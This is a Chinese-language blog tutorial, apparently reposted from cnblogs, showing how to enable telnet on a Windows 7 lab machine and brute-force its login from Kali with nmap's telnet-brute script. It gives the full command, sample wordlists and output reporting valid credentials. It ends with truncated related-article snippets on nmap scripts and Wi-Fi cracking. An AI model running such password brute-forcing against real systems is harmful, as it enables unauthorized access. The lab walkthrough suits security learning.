今天老黑走出了低谷,设置了惩罚机制后效率提升了很多,现在写一个使用nmap检测目标主机漏洞和利用漏洞的文章,话不多说,直接开始!

0x01:环境介绍

  主机A:系统 - kali2017,IP - 192.168.1.104

  主机B:系统 - win7x64,IP - 192.168.1.103

  使用主机A扫描并攻入主机B

0x02:确认主机B开启了telnet的23端口

  主机B没有开启,我自己开启一下。

  s1:控制面板 -> 程序 -> 打开或关闭windows程序 -> 选中下图选项框,点击确认后重启系统。

  s2:确认计算机telnet服务是否已经开启。打开计算机右击 -> 管理 -> 服务和应用程序 -> 服务 -> 找到Telnet服务,并将其开启服务和设置自动

0x03:在主机A扫描确认主机B是否开启了23端口

  

0x04:进行爆破

  s1:参考官网了解,爆破命令如下

nmap -p 23 --script telnet-brute --script-args userdb=myusers.lst,passdb=mypwds.lst,telnet-brute.timeout=8s <target>

  s2:制造自己的myusers.lst和mypwds.lst

    老黑将自己的账号AAAA放在myusers.lst中,如下:

    

AAAA
AA22
ASDFSA
SDSDD

    将自己的密码BBBB放在mypwds.lst中,如下:

BBBB
BB23
DFASDFA
SADFAA

    根据主机A的环境,调整命令,如下:

nmap -p 23 --script telnet-brute --script-args userdb=./userpass/myusers.lst,passdb=./userpass/mypwds.lst,telnet-brute.timeout=8s 192.168.1.103

  s3:执行命令,等待结果

root@l:~# nmap -p 23 --script telnet-brute --script-args userdb=./userpass/myusers.lst,passdb=./userpass/mypwds.lst,telnet-brute.timeout=8s 192.168.1.103Starting Nmap 7.60 ( https://nmap.org ) at 2017-11-15 18:18 CST
Nmap scan report for promote.cache-dns.local (192.168.1.103)
Host is up (0.091s latency).PORT   STATE SERVICE
23/tcp open  telnet
| telnet-brute:
|   Accounts:
|     AAAA:BBBB - Valid credentials
|_  Statistics: Performed 6 guesses in 1 seconds, average tps: 6.0
MAC Address: XXXXXXXXXXXXX (xxxxxxxxxxxx.)Nmap done: 1 IP address (1 host up) scanned in 1.49 seconds

  

0x05:telnet登陆主机B,WELL DONE!

转载于:https://www.cnblogs.com/heijuelou/p/7840371.html

【20171115中】nmap 使用脚本爆破telnet密码相关推荐

  1. Linux中nmap脚本的目录,nmap脚本指南

    脚本参数SCRIPT SCAN: -sC: equivalent to --script=default --script=: is a comma separated list of directo ...

  2. python——利用nmap进行端口扫描,爆破ftp密码,上传wellshell.

    一.端口扫描 首先安装nmap与python-nmap模块.从http://nmap.org/download.html网站下载nmap安装文件.从http://xael.org/norman/pyt ...

  3. Linux中nmap脚本的目录,在Linux中,如何使用Nmap脚本引擎(NSE )脚本

    Nmap是一个流行的,功能强大,跨平台的命令行网络安全扫描和探测工具,您可以使用它来查找所有活动主机的IP地址,扫描在这些主机上运行的开放端口和服务等等. Nmap的一个有趣的特性是Nmap脚本引擎( ...

  4. 渗透之——爆破Wifi密码脚本

    转载请注明出处:https://blog.csdn.net/l1028386804/article/details/86523441 不多说,直接上代码,有问题的问我: #-*- coding: UT ...

  5. 一些Nmap NSE脚本推荐

    前言 Nmap是一款强大的开源扫描工具.同时Nmap提供了强大的脚本引擎(Nmap Scripting Engine),支持通过Lua脚本语言来扩展Nmap的功能,在Nmap的发行版中已经包含了数百个 ...

  6. 破解文件系统telnet密码【ZT】

    http://www.ebaina.com/u-mx644978170/blog-74.html 因工作需要需要调试某公司的3531板子,运行我们的程序,从整个调试过程中还是学到一些知识的现在记录下. ...

  7. nmap mysql爆破_关于Nmap的简单爆破

    首先我们来对目标系统进行一次简单的扫描,.以确定其开放的服务有哪些: nmap 192.168.30.128 可以看到,目标服务器开放了众多的服务端口! 下面我们来对其 SMB 服务进行一个简单爆破: ...

  8. 18个一线工作中常用Shell脚本(纯干货)

    点击上方 终端研发部,选择 设为星标 每天9:30点,干货准时奉上! 1.检测两台服务器指定目录下的文件一致性 #!/bin/bash ################################ ...

  9. 在windows程序中嵌入Lua脚本引擎--编写自己的Lua库

    在<在windows程序中嵌入Lua脚本引擎--建立一个简易的"云命令"执行的系统>一文中,我提到了使用Lua的ffi库,可以让我们像写C代码一样写lua程序.这是个非 ...

最新文章

  1. R语言spine作棘状图
  2. mysql 5.5.38_数据库的硬迁移和mysql 5.5.38源码安装
  3. JavaScript 返回多个值
  4. 单片机 10种软件滤波方法的示例程序
  5. linux基础命令练习1
  6. UNITY C#内存泄漏
  7. Electron学习-创建一个程序
  8. PHP 国家电话区号 PHP Countries and their call codes with two letter abbreviations
  9. mysql查询表变量_MySQL 之SQL语言、表库操作、查询及变量精讲
  10. 用js把数据从一个页面传到另一个页面
  11. 《老罗Android开发视频教程》老罗来交国庆的答卷了
  12. 雷达信号处理基础ppt
  13. Linux 下常用软件包安装
  14. Java编写五线谱上的音符_记住五线谱上音符的方法
  15. 蝉道Bug管理工具的环境搭建
  16. 信息系统项目管理师考试重点汇总,看完这篇再拿十分!
  17. 不知道RabbitMQ中Exchange类型Internal是什么意思?这边来~
  18. 投资中最简单的事儿(量价双突破,买错也要买)
  19. 电信物联网平台SOTA升级(软件升级)的全流程说明
  20. k8s cka 考试指南

热门文章

  1. java中的static方法可以被重写吗?(从方法调用过程理解)
  2. Collection集合--ArrayList源码读后感总结
  3. DOS环境下支持的最大内存是多少?
  4. 深度学习输入模式与适当的网络架构之间的对应关系
  5. 全双工和半双工的区别
  6. 学习编程做笔记的软件_可以在图片上做笔记的软件
  7. 来电通java版_终于有人把Java程序员必学知识点整理出来了,令人有如醍醐灌顶...
  8. idea 两次运行同一main方法 开启两个进程
  9. 逻辑运算符和||与(和|)的区别
  10. 036_PageHeader页头